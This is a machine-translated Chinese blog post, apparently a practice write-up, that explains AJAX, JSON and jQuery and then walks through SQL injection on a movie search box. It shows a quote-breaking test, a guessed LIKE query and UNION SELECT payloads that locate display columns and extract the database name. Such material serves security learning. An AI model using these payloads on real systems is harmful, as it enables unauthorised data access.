当前位置:网站首页>SQL Injection (AJAX/JSON/jQuery)
SQL Injection (AJAX/JSON/jQuery)
2022-07-03 13:45:00 【this is hhhhp】
1.AJAX/JSON/jQuery
(1)AJAX
Through a small amount of data exchange with the server in the background ,AJAX Asynchronous update of web pages . This means that you can load the entire page without reloading it , Update a part of the web page in real time .
(2)JSON
JSON (JavaScript Object Notation) Is a lightweight data exchange format .
Is a data format .
(3)jQuery
jQuery It's a JavaScript library , Use jQuery Not only will it take a lot of JavaScript Code to achieve the function reduced to a few lines of code , It also provides enough high-speed performance , It's a skill that every website developer should master .
2. Inject
Let's grab a bag first :
Enter... In the input box i
Bag caught :
first line ,title=i, Change to ' have a look :
sql Wrong report , guess sql The statement is as follows :
select * from Table name where Title like '%". User input ."%'
So it can be constructed like this sql sentence :
select * from Table name where Title like '%"' or '"%
The inquiry is correct , All the movies are
On this basis, inject :
0' union select 1,2,3,4,5,6,7 '
obtain 2,3,4,5, altogether 4 Displayable bits
Blast storage :
0' union select 1,database(),3,4,5,6,7 '
Just behind GET/Search About the same .
边栏推荐
- When updating mysql, the condition is a query
- JS 将伪数组转换成数组
- Which securities company has the lowest Commission for opening an account online? I want to open an account. Is it safe for the online account manager to open an account
- Unity Render Streaming通过Js与Unity自定义通讯
- Mysql database basic operation - regular expression
- Complete DNN deep neural network CNN training with tensorflow to complete image recognition cases
- 又一个行业被中国芯片打破空白,难怪美国模拟芯片龙头降价抛售了
- 【电脑插入U盘或者内存卡显示无法格式化FAT32如何解决】
- 道路建设问题
- Golang — template
猜你喜欢
Can newly graduated European college students get an offer from a major Internet company in the United States?
Mysql database basic operation - regular expression
太阳底下无新事,元宇宙能否更上层楼?
Brief analysis of tensorboard visual processing cases
Kivy tutorial how to automatically load kV files
Smbms project
Universal dividend source code, supports the dividend of any B on the BSC
8 Queen question
Mycms we media mall v3.4.1 release, user manual update
(first) the most complete way to become God of Flink SQL in history (full text 180000 words, 138 cases, 42 pictures)
随机推荐
106. How to improve the readability of SAP ui5 application routing URL
Road construction issues
Kivy教程之 如何通过字符串方式载入kv文件设计界面(教程含源码)
栈应用(平衡符)
R语言gt包和gtExtras包优雅地、漂亮地显示表格数据:nflreadr包以及gtExtras包的gt_plt_winloss函数可视化多个分组的输赢值以及内联图(inline plot)
[redis] cache warm-up, cache avalanche and cache breakdown
AI scores 81 in high scores. Netizens: AI model can't avoid "internal examination"!
pytorch 载入历史模型时更换gpu卡号,map_location设置
【被动收入如何挣个一百万】
windos 创建cordova 提示 因为在此系统上禁止运行脚本
mysql更新时条件为一查询
太阳底下无新事,元宇宙能否更上层楼?
PowerPoint 教程,如何在 PowerPoint 中將演示文稿另存為視頻?
Task6: using transformer for emotion analysis
Spark实战1:单节点本地模式搭建Spark运行环境
The R language GT package and gtextras package gracefully and beautifully display tabular data: nflreadr package and gt of gtextras package_ plt_ The winloss function visualizes the win / loss values
掌握Cypress命令行选项,是真正掌握Cypress的基础
In the promotion season, how to reduce the preparation time of defense materials by 50% and adjust the mentality (personal experience summary)
Introduction to the implementation principle of rxjs observable filter operator
Universal dividend source code, supports the dividend of any B on the BSC